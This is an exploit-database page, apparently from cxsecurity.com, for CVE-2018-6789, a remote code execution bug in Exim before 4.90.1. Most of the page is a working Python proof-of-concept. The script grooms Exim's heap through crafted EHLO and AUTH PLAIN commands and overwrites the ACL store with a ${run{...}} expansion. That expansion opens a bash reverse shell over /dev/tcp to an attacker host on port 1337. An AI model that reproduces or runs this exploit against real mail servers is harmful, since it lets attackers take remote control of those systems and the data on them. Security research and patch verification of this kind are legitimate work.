Exim < 4.90.1 base64d Remote Code Execution

2018.05.02
Credit: straight_blast
Risk: High
Local: No
Remote: Yes
CVE: CVE-2018-6789
CWE: CWE-119


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python import time import socket import struct s = None f = None def logo(): print print " CVE-2018-6789 Poc Exploit" print "@straight_blast ; straightblast426@gmail.com" print def connect(host, port): global s global f s = socket.create_connection((host,port)) f = s.makefile('rw', bufsize=0) def p(v): return struct.pack("<Q", v) def readuntil(delim='\n'): data = '' while not data.endswith(delim): data += f.read(1) return data def write(data): f.write(data + "\n") def ehlo(v): write("EHLO " + v) readuntil('HELP') def unrec(v): write(v) readuntil('command') def auth_plain(v): encode = v.encode('base64').replace('\n','').replace('=','') write("AUTH PLAIN " + encode) readuntil('data') def one_byte_overwrite(): v = "C" * 8200 encode = v.encode('base64').replace('\n','').replace('=','') encode = encode[:-1] + "PE" write("AUTH PLAIN " + encode) readuntil('data') def exploit(): logo() connect('localhost', 25) print "[1] connected to target" time.sleep(0.5) ehlo("A" * 8000) ehlo("B" * 16) print "[2] created free chunk size 0x6060 in unsorted bin" unrec("\xff" * 2000) ehlo("D" * 8200) one_byte_overwrite() print "[3] triggered 1 byte overwrite to extend target chunk size from 0x2020 to 0x20f0" fake_header = p(0) fake_header += p(0x1f51) auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header))) print "[4] patched chunk with fake header so extended chunk can be freed" ehlo("F" * 16) print "[5] freed extended chunk" unrec("\xff" * 2000) unrec("\xff" * 2000) print "[6] occupied 1st and 3rd item in unsorted bin with fillers" fake_header = p(0x4110) fake_header += p(0x1f50) auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header))) print "[7] patched chunk with fake header so extended chunk can be allocated" address = 0x55d7e5864480 auth_plain("H" * 8200 + p(0x2021) + p(address) + p(0x2008) + "H" * 184) print "[8] overwrite 'next' pointer with ACL store block address" ehlo("I" * 16) print "[9] freed the ACL store block" acl_smtp_rcpt_offset = 288 local_host = '192.168.0.159' local_port = 1337 cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\"" cmd_expansion_string = "${run{" + cmd + "}}\0" auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression" write("MAIL FROM:<test@pwned.com>") readuntil("OK") write("RCPT TO:<shell@pwned.com>") print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!" print if __name__ == '__main__': exploit()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top